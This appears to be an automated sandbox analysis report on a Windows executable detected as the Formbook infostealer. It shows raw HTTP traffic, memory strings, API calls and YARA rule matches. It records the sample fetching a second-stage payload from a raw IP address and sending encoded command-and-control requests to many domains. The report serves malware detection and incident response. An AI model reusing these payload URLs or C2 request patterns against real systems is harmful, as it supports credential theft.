          Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Mon, 20 Mar 2023 08:15:56 GMTContent-Type: text/htmlContent-Length: 2843Connection: closeVary: Accept-EncodingLast-Modified: Tue, 20 Apr 2021 00:29:25 GMTETag: "b1b-5c05c89d55ec5"Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 6a 61 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 45 55 43 2d 4a 50 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 58 53 45 52 56 45 52 20 49 6e 63 2e 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 49 4e 44 45 58 2c 46 4f 4c 4c 4f 57 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 2c 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 2a 20 7b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 7d 0a 69 6d 67 20 7b 0a 20 20 20 20 62 6f 72 64 65 72 3a 20 30 3b 0a 7d 0a 75 6c 20 7b 0a 20 20 20 20 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 20 32 65 6d 3b 0a 7d 0a 68 74 6d 6c 20 7b 0a 20 20 20 20 6f 76 65 72 66 6c 6f 77 2d 79 3a 20 73 63 72 6f 6c 6c 3b 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 33 62 37 39 62 37 3b 0a 7d 0a 62 6f 64 79 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 a5 e1 a5 a4 a5 ea a5 aa 22 2c 20 4d 65 69 72 79 6f 2c 20 22 a3 cd a3 d3 20 a3 d0 a5 b4 a5 b7 a5 c3 a5 af 22 2c 20 22 4d 53 20 50 47 6f 74 68 69 63 22 2c 20 22 a5 d2 a5 e9 a5 ae a5 ce b3 d1 a5 b4 20 50 72 6f 20 57 33 22 2c 20 22 48 69 72 61 67 69 6e 6f 20 4b 61 6b 75 20 47 6f 74 68 69 63 20 50 72 6f 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 34 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 37 35 25 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 77 68 69 74 65 3b 0a 7d 0a 68 31 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 34 70 78 3b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64 3b 0a 7d 0a 68 31 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 3b 0a 20 20 20 20 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 20 32 30 70 78 3b 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 7d 0a 68 32 20 7b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64 3b 0
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 20 Mar 2023 08:16:17 GMTServer: ApacheContent-Length: 196Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
          Source: unknownTCP traffic detected without corresponding DNS query: 195.133.40.46
          Source: unknownTCP traffic detected without corresponding DNS query: 195.133.40.46
          Source: unknownTCP traffic detected without corresponding DNS query: 195.133.40.46
          Source: unknownTCP traffic detected without corresponding DNS query: 195.133.40.46
          Source: unknownTCP traffic detected without corresponding DNS query: 195.133.40.46
          Source: unknownTCP traffic detected without corresponding DNS query: 195.133.40.46
          Source: unknownTCP traffic detected without corresponding DNS query: 195.133.40.46
          Source: unknownTCP traffic detected without corresponding DNS query: 195.133.40.46
          Source: unknownTCP traffic detected without corresponding DNS query: 195.133.40.46
          Source: unknownTCP traffic detected without corresponding DNS query: 195.133.40.46
          Source: unknownTCP traffic detected without corresponding DNS query: 195.133.40.46
          Source: unknownTCP traffic detected without corresponding DNS query: 195.133.40.46
          Source: unknownTCP traffic detected without corresponding DNS query: 195.133.40.46
          Source: unknownTCP traffic detected without corresponding DNS query: 195.133.40.46
          Source: unknownTCP traffic detected without corresponding DNS query: 195.133.40.46
          Source: unknownTCP traffic detected without corresponding DNS query: 195.133.40.46
          Source: unknownTCP traffic detected without corresponding DNS query: 195.133.40.46
          Source: unknownTCP traffic detected without corresponding DNS query: 195.133.40.46
          Source: unknownTCP traffic detected without corresponding DNS query: 195.133.40.46
          Source: unknownTCP traffic detected without corresponding DNS query: 195.133.40.46
          Source: unknownTCP traffic detected without corresponding DNS query: 195.133.40.46
          Source: unknownTCP traffic detected without corresponding DNS query: 195.133.40.46
          Source: unknownTCP traffic detected without corresponding DNS query: 195.133.40.46
          Source: unknownTCP traffic detected without corresponding DNS query: 195.133.40.46
          Source: unknownTCP traffic detected without corresponding DNS query: 195.133.40.46
          Source: unknownTCP traffic detected without corresponding DNS query: 195.133.40.46
          Source: unknownTCP traffic detected without corresponding DNS query: 195.133.40.46
          Source: unknownTCP traffic detected without corresponding DNS query: 195.133.40.46
          Source: unknownTCP traffic detected without corresponding DNS query: 195.133.40.46
          Source: unknownTCP traffic detected without corresponding DNS query: 195.133.40.46
          Source: unknownTCP traffic detected without corresponding DNS query: 195.133.40.46
          Source: unknownTCP traffic detected without corresponding DNS query: 195.133.40.46
          Source: unknownTCP traffic detected without corresponding DNS query: 195.133.40.46
          Source: unknownTCP traffic detected without corresponding DNS query: 195.133.40.46
          Source: unknownTCP traffic detected without corresponding DNS query: 195.133.40.46
          Source: unknownTCP traffic detected without corresponding DNS query: 195.133.40.46
          Source: unknownTCP traffic detected without corresponding DNS query: 195.133.40.46
          Source: unknownTCP traffic detected without corresponding DNS query: 195.133.40.46
          Source: unknownTCP traffic detected without corresponding DNS query: 195.133.40.46
          Source: unknownTCP traffic detected without corresponding DNS query: 195.133.40.46
          Source: unknownTCP traffic detected without corresponding DNS query: 195.133.40.46
          Source: unknownTCP traffic detected without corresponding DNS query: 195.133.40.46
          Source: unknownTCP traffic detected without corresponding DNS query: 195.133.40.46
          Source: unknownTCP traffic detected without corresponding DNS query: 195.133.40.46
          Source: unknownTCP traffic detected without corresponding DNS query: 195.133.40.46
          Source: unknownTCP traffic detected without corresponding DNS query: 195.133.40.46
          Source: unknownTCP traffic detected without corresponding DNS query: 195.133.40.46
          Source: unknownTCP traffic detected without corresponding DNS query: 195.133.40.46
          Source: unknownTCP traffic detected without corresponding DNS query: 195.133.40.46
          Source: unknownTCP traffic detected without corresponding DNS query: 195.133.40.46
          Source: SC.028UCCP.exe, 00000006.00000002.3034808343.0000000004C7B000.00000004.00000020.00020000.00000000.sdmp, SC.028UCCP.exe, 00000006.00000002.3034808343.0000000004C5B000.00000004.00000020.00020000.00000000.sdmp, SC.028UCCP.exe, 00000006.00000002.3034808343.0000000004C7E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://195.133.40.46/
          Source: SC.028UCCP.exe, 00000006.00000002.3034808343.0000000004C18000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://195.133.40.46/CsPlxqjFa224.bin
          Source: SC.028UCCP.exe, 00000006.00000002.3034808343.0000000004C18000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://195.133.40.46/CsPlxqjFa224.bin0
          Source: SC.028UCCP.exe, 00000006.00000002.3034808343.0000000004C83000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://195.133.40.46/CsPlxqjFa224.bin3
          Source: SC.028UCCP.exe, 00000006.00000002.3034808343.0000000004C18000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://195.133.40.46/CsPlxqjFa224.binU
          Source: SC.028UCCP.exe, 00000006.00000002.3034808343.0000000004C83000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://195.133.40.46/CsPlxqjFa224.bin~
          Source: SC.028UCCP.exe, 00000006.00000002.3034808343.0000000004C7E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://195.133.40.46/G
          Source: SC.028UCCP.exe, 00000006.00000001.2747874116.0000000000649000.00000020.00000001.01000000.00000007.sdmpString found in binary or memory: http://inference.location.live.com11111111-1111-1111-1111-111111111111https://partnernext-inference.
          Source: SC.028UCCP.exe, SC.028UCCP.exe, 00000000.00000000.2396678614.0000000000409000.00000008.00000001.01000000.00000003.sdmp, SC.028UCCP.exe, 00000000.00000002.2934571208.0000000000409000.00000004.00000001.01000000.00000003.sdmp, SC.028UCCP.exe, 00000006.00000000.2747209758.0000000000409000.00000008.00000001.01000000.00000003.sdmpString found in binary or memory: http://nsis.sf.net/NSIS_Error
          Source: SC.028UCCP.exe, 00000000.00000000.2396678614.0000000000409000.00000008.00000001.01000000.00000003.sdmp, SC.028UCCP.exe, 00000000.00000002.2934571208.0000000000409000.00000004.00000001.01000000.00000003.sdmp, SC.028UCCP.exe, 00000006.00000000.2747209758.0000000000409000.00000008.00000001.01000000.00000003.sdmpString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
          Source: explorer.exe, 00000007.00000003.3115928229.000000000D7B8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.4196973708.000000000D7B8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTBL0V27RVZ7LBduom%2FnYB45SPUEwQU5Z1ZMIJHWMys%
          Source: explorer.exe, 00000007.00000002.7445959237.0000000002C70000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://schemas.micro
          Source: SC.028UCCP.exe, 00000006.00000001.2747874116.0000000000649000.00000020.00000001.01000000.00000007.sdmpString found in binary or memory: http://www.gopher.ftp://ftp.
          Source: SC.028UCCP.exe, 00000006.00000001.2747874116.0000000000626000.00000020.00000001.01000000.00000007.sdmpString found in binary or memory: http://www.ibm.com/data/dtd/v11/ibmxhtml1-transitional.dtd-//W3O//DTD
          Source: SC.028UCCP.exe, 00000006.00000001.2747874116.00000000005F2000.00000020.00000001.01000000.00000007.sdmpString found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtd
          Source: SC.028UCCP.exe, 00000006.00000001.2747874116.00000000005F2000.00000020.00000001.01000000.00000007.sdmpString found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd
          Source: explorer.exe, 00000007.00000003.3115928229.000000000D7B8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.4196973708.000000000D7B8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/
          Source: explorer.exe, 00000007.00000003.3115928229.000000000D7B8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.4196973708.000000000D7B8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/j
          Source: explorer.exe, 00000007.00000003.3110344796.0000000010C0C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
          Source: explorer.exe, 00000007.00000000.2898033699.000000000996D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?
          Source: explorer.exe, 00000007.00000000.2906971222.000000000D89D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://excel.office.coma
          Source: SC.028UCCP.exe, 00000006.00000001.2747874116.0000000000649000.00000020.00000001.01000000.00000007.sdmpString found in binary or memory: https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214
          Source: explorer.exe, 00000007.00000000.2906971222.000000000D89D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://outlook.com
          Source: explorer.exe, 00000007.00000003.3115928229.000000000D778000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.digicert.com/CPS0
          Source: explorer.exe, 00000007.00000002.7485227128.000000001416F000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.laposadaapts.com/ms12/?hT=vo99NxIlv9atltQAf5
          Source: unknownDNS traffic detected: queries for: 97.97.242.52.in-addr.arpa
          Source: global trafficHTTP traffic detected: GET /CsPlxqjFa224.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: 195.133.40.46Cache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /ms12/?a6A8=p0GhgVm0MHDdp8m&hT=qQKx9PCKTcR0X3fJLav3D/FI6bogqcX+QhlqDFXKzmg3lH7RMn/qXLrYouNPLK8mW2// HTTP/1.1Host: www.paparazirestaurant.co.ukConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /ms12/?hT=3vbl2R1UVlik5qBB6wrenITxXeLVrWa6N7N62KRalH+vVSA16yD/agKPQdEyB3rsS7Yj&a6A8=p0GhgVm0MHDdp8m HTTP/1.1Host: www.eliteequinewellness.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /ms12/?a6A8=p0GhgVm0MHDdp8m&hT=GEgy5f1eXaBWyRpWMBxBbWcEY1MHcvciQ8raEzEPejcDf7w8zE5rQdkYfLeQVLgbPBXb HTTP/1.1Host: www.economjchq.spaceConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /ms12/?hT=rKVQxN6JSordSXvKLLfEBVUre63ztGesQlGfCtix5zz1Yo/EERiTRw3ZQxg6mz/OTP1R&a6A8=p0GhgVm0MHDdp8m HTTP/1.1Host: www.friendsofquarepianos.co.ukConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /ms12/?hT=aVqkBEdIHBWaW/lsOPNfNUdw5ZC180ox2ANf6BVSo52uRq15en0/dTfjz5sq7L16GRwO&a6A8=p0GhgVm0MHDdp8m HTTP/1.1Host: www.arialttnr.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /ms12/?hT=rnwHnBjC2B91WSvUx5IF3sWIhMPrpsyX3rQSnskEXaZlLwDtCWtuXGHAHocTRNCypERK&a6A8=p0GhgVm0MHDdp8m HTTP/1.1Host: www.garageautosaintthomas.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /ms12/?a6A8=p0GhgVm0MHDdp8m&hT=i6mctz/lYNz9iKxESYWey4cK6TMKWjJsbrWHZTfqTQLBeE+tWIBGneMXWwL4vjyr8Zpy HTTP/1.1Host: www.hospitalityhsia.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /ms12/?hT=GAqcOfRaXYyBPpQNc1d4+pcaGBxp+bphJlxAZfzVtb5VN+LprCdBX89oplvsYdaz1A4Y&a6A8=p0GhgVm0MHDdp8m HTTP/1.1Host: www.abimpianti.chConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /ms12/?a6A8=p0GhgVm0MHDdp8m&hT=dB2SKHnvFm/evHV5UtSyv0UoYXCrydohCzjDkTmDf/VJc0uDcAnYtxnT/Jo2TNbLuMGT HTTP/1.1Host: www.drugtestingservices.co.ukConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /ms12/?a6A8=p0GhgVm0MHDdp8m&hT=KsItnxjux7GTZO7TUTKtm8QLzBBO9NcCFMwewp8NtohxkT6a6dLohlItrjGlglAawoap HTTP/1.1Host: www.amyjohnsonrealtor.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /ms12/?hT=XQDAKTxCfPAtZ1kZf5EiiDFWaFS1BQmSMuwLBzPPFACL8OgktJOl440I6bHrpdhUiEnu&a6A8=p0GhgVm0MHDdp8m HTTP/1.1Host: www.lists-cellphones.lifeConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /ms12/?hT=G6LllRn2UhCgoj9/NoDttLpXGK4pGwfwFGBz2EgLi6yWMZIZhDysno0vSCCcnKmdw4QQ&UlWl0=MBZlMJlh34CHQ HTTP/1.1Host: www.findyellowfreightjobs.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /ms12/?hT=YOOWDLIFFjmzpH1SAG7YZM+LVKYOCEYmA0eV1woM6pvlajKzKUVwFam52RyaFl1jbOMY&UlWl0=MBZlMJlh34CHQ HTTP/1.1Host: www.conscienciaretroprogresiva.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /ms12/?hT=lfzlfRYQFuadehd27GXthwlbqohm3e93HBX/EbDE1KV1AljB6VPD+GnlvvGiXqJ/lo6n&UlWl0=MBZlMJlh34CHQ HTTP/1.1Host: www.triknblog.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /ms12/?hT=GAqcOfRaXYyBPpQNc1d4+pcaGBxp+bphJlxAZfzVtb5VN+LprCdBX89oplvsYdaz1A4Y&UlWl0=MBZlMJlh34CHQ HTTP/1.1Host: www.abimpianti.chConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 0_2_00404FE3 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,

          E-Banking Fraud

          barindex
          Source: Yara matchFile source: 00000008.00000002.7446412536.0000000004940000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.7445956463.0000000004910000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.2969631128.00000000000A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.3048431353.0000000034AC0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.7444154369.0000000002C00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

          System Summary

          barindex
          Source: 00000008.00000002.7446412536.0000000004940000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000008.00000002.7446412536.0000000004940000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000008.00000002.7446412536.0000000004940000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000008.00000002.7445956463.0000000004910000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000008.00000002.7445956463.0000000004910000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000008.00000002.7445956463.0000000004910000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000007.00000002.7461101436.000000000AD28000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_772cc62d Author: unknown
          Source: 00000006.00000002.2969631128.00000000000A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000002.2969631128.00000000000A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000002.2969631128.00000000000A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000006.00000002.3048431353.0000000034AC0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000002.3048431353.0000000034AC0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000002.3048431353.0000000034AC0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000008.00000002.7444154369.0000000002C00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000008.00000002.7444154369.0000000002C00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000008.00000002.7444154369.0000000002C00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: Process Memory Space: SC.028UCCP.exe PID: 2704, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: SC.028UCCP.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
          Source: 00000008.00000002.7446412536.0000000004940000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000008.00000002.7446412536.0000000004940000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000008.00000002.7446412536.0000000004940000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000008.00000002.7445956463.0000000004910000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000008.00000002.7445956463.0000000004910000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000008.00000002.7445956463.0000000004910000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000007.00000002.7461101436.000000000AD28000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_772cc62d os = windows, severity = x86, creation_date = 2022-05-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8343b5d02d74791ba2d5d52d19a759f761de2b5470d935000bc27ea6c0633f5, id = 772cc62d-345c-42d8-97ab-f67e447ddca4, last_modified = 2022-07-18
          Source: 00000006.00000002.2969631128.00000000000A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000002.2969631128.00000000000A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000002.2969631128.00000000000A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000006.00000002.3048431353.0000000034AC0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
